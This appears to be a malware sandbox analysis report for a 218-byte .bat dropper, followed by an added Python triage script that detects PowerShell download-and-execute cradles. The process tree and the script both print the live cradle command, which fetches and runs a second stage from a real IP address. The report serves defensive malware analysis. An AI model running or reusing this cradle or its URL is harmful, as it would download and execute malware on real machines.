Analysis
- max time kernel: 81s
- max time network: 93s
- platform: windows10_x64
- resource: win10v200722
- submitted: 03-08-2020 09:10
Static task: static1

Behavioral task: behavioral1
- Sample: 2b4587aed40db6e44cbff092b52b841e.bat
- Resource: win7 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: 2b4587aed40db6e44cbff092b52b841e.bat
- Resource: win10v200722 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: 2b4587aed40db6e44cbff092b52b841e.bat
- Size: 218B
- MD5: c69dabb8c2f1ca155fb5fe3b0482d0a7
- SHA1: b3faaf0bd82fe27b076ec814b2123cf962ead51b
- SHA256: 99824d3ef35b84b0fc40214867e3c54e5518491efa1c5c9d796b1acb2cbe81d7
- SHA512: c5fc762e4d76e921bd55faa68fff86efe13f0b49b7cbeaaf2d4050cbb8e65f400399d84acf4056e36c8f560a8e9a7fd5b9c711fcb0ef23f65f14ea0724eef174
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: URLs
- ps1.dropper: http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e
Signatures

Program crash (1 IoC)
Processes:
  pid  pid_target  process       target process
  668  3932        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                pid  process
  Token: SeRestorePrivilege  668  WerFault.exe
  Token: SeBackupPrivilege   668  WerFault.exe
  Token: SeDebugPrivilege    668  WerFault.exe

Suspicious behavior: EnumeratesProcesses (13 IoCs)
Processes:
  pid  process
  668  WerFault.exe  (13 identical hits)

ServiceHost packer (6 IoCs)
Detects ServiceHost packer used for .NET malware
Processes:
  resource                                                  yara_rule
  behavioral2/memory/3932-2-0x0000000000000000-mapping.dmp  servicehost
  behavioral2/memory/3932-3-0x0000000000000000-mapping.dmp  servicehost
  behavioral2/memory/3932-4-0x0000000000000000-mapping.dmp  servicehost
  behavioral2/memory/3932-5-0x0000000000000000-mapping.dmp  servicehost
  behavioral2/memory/3932-6-0x0000000000000000-mapping.dmp  servicehost
  behavioral2/memory/3932-7-0x0000000000000000-mapping.dmp  servicehost

Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
  description                       pid   process  target process
  PID 3060 wrote to memory of 3932  3060  cmd.exe  powershell.exe  (3 identical hits)
Processes
- C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2b4587aed40db6e44cbff092b52b841e.bat"
  PID: 3060
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e');Invoke-SLSOBOXXDQW;Start-Sleep -s 10000"
    PID: 3932
    - C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 704
      PID: 668
      Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
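The process tree above is the whole story of this sample: cmd.exe runs the .bat, which launches 32-bit PowerShell with a download-and-execute cradle (IEX over WebClient.DownloadString), calls a function that only exists in the fetched script (Invoke-SLSOBOXXDQW), and sleeps; WerFault.exe is then started for that PowerShell process, so the second stage crashed in the sandbox. The following triage helper is an added example and is not part of the sandbox report or of any sandbox product. It walks a copy of the process list transcribed from the tree (parent links follow the nesting), flags the cradle, and pulls out the stage-2 URL, the invoked function name, whether the host ran the SysWOW64 PowerShell, and whether WerFault reported that PID. The regexes, the Proc record and the field names are assumptions of this example, not report fields.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class Proc:
    """One row of a sandbox process tree (constructed for this example)."""
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str


# Transcribed from the report's process tree; parent links follow its nesting.
PROCESSES = [
    Proc(3060, None, r"C:\Windows\system32\cmd.exe",
         r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2b4587aed40db6e44cbff092b52b841e.bat"'),
    Proc(3932, 3060, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e');Invoke-SLSOBOXXDQW;Start-Sleep -s 10000"'''),
    Proc(668, 3932, r"C:\Windows\SysWOW64\WerFault.exe",
         r"C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 704"),
]

# Download-and-execute cradle: an IEX/Invoke-Expression and a WebClient download
# method in the same command line, in either order (assumed pattern).
CRADLE_RE = re.compile(
    r"\b(?:IEX|Invoke-Expression)\b.*\b(?:DownloadString|DownloadData|DownloadFile)\b"
    r"|\b(?:DownloadString|DownloadData)\b.*\b(?:IEX|Invoke-Expression)\b",
    re.I | re.S,
)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
INVOKE_RE = re.compile(r"(?<![\w-])(Invoke-[A-Za-z0-9_]+)")
# WerFault.exe -p <pid> names the process it was started for.
WERFAULT_TARGET_RE = re.compile(r"-p\s+(\d+)\b")


def find_cradles(procs):
    """Return one finding per PowerShell process whose command line is a cradle."""
    by_pid = {p.pid: p for p in procs}
    crashed = set()
    for p in procs:
        if p.image.lower().endswith("werfault.exe"):
            m = WERFAULT_TARGET_RE.search(p.cmdline)
            if m:
                crashed.add(int(m.group(1)))
    findings = []
    for p in procs:
        if not p.image.lower().endswith("powershell.exe"):
            continue
        if not CRADLE_RE.search(p.cmdline):
            continue
        parent = by_pid.get(p.ppid)
        findings.append({
            "pid": p.pid,
            "parent_image": parent.image if parent else None,
            # SysWOW64 PowerShell on an x64 host is the 32-bit interpreter;
            # worth recording as context, not proof of anything on its own.
            "wow64": "\\syswow64\\" in p.image.lower(),
            "urls": URL_RE.findall(p.cmdline),
            # Verb-Noun names called after the fetch: functions defined by the
            # downloaded script rather than by the cradle itself.
            "invoked": [f for f in INVOKE_RE.findall(p.cmdline)
                        if f.lower() != "invoke-expression"],
            "crashed": p.pid in crashed,
        })
    return findings


if __name__ == "__main__":
    for f in find_cradles(PROCESSES):
        print(f"pid {f['pid']} ({'wow64 ' if f['wow64'] else ''}powershell) "
              f"spawned by {f['parent_image']}")
        for u in f["urls"]:
            print("  stage-2 URL :", u)
        for name in f["invoked"]:
            print("  invoked     :", name)
        print("  crashed     :", f["crashed"])
```

The URL and the Invoke-SLSOBOXXDQW name are the two indicators worth carrying out of this report: the first is the stage-2 source (the ps1.dropper entry under Malware Config), the second is the entry point of whatever that paste served at the time. The crash flag matters for interpretation: with WerFault attached to PID 3932, the YARA hits on that process's memory dumps are the only evidence of what the downloaded script loaded, and a rerun with the paste unavailable will show nothing past the cradle.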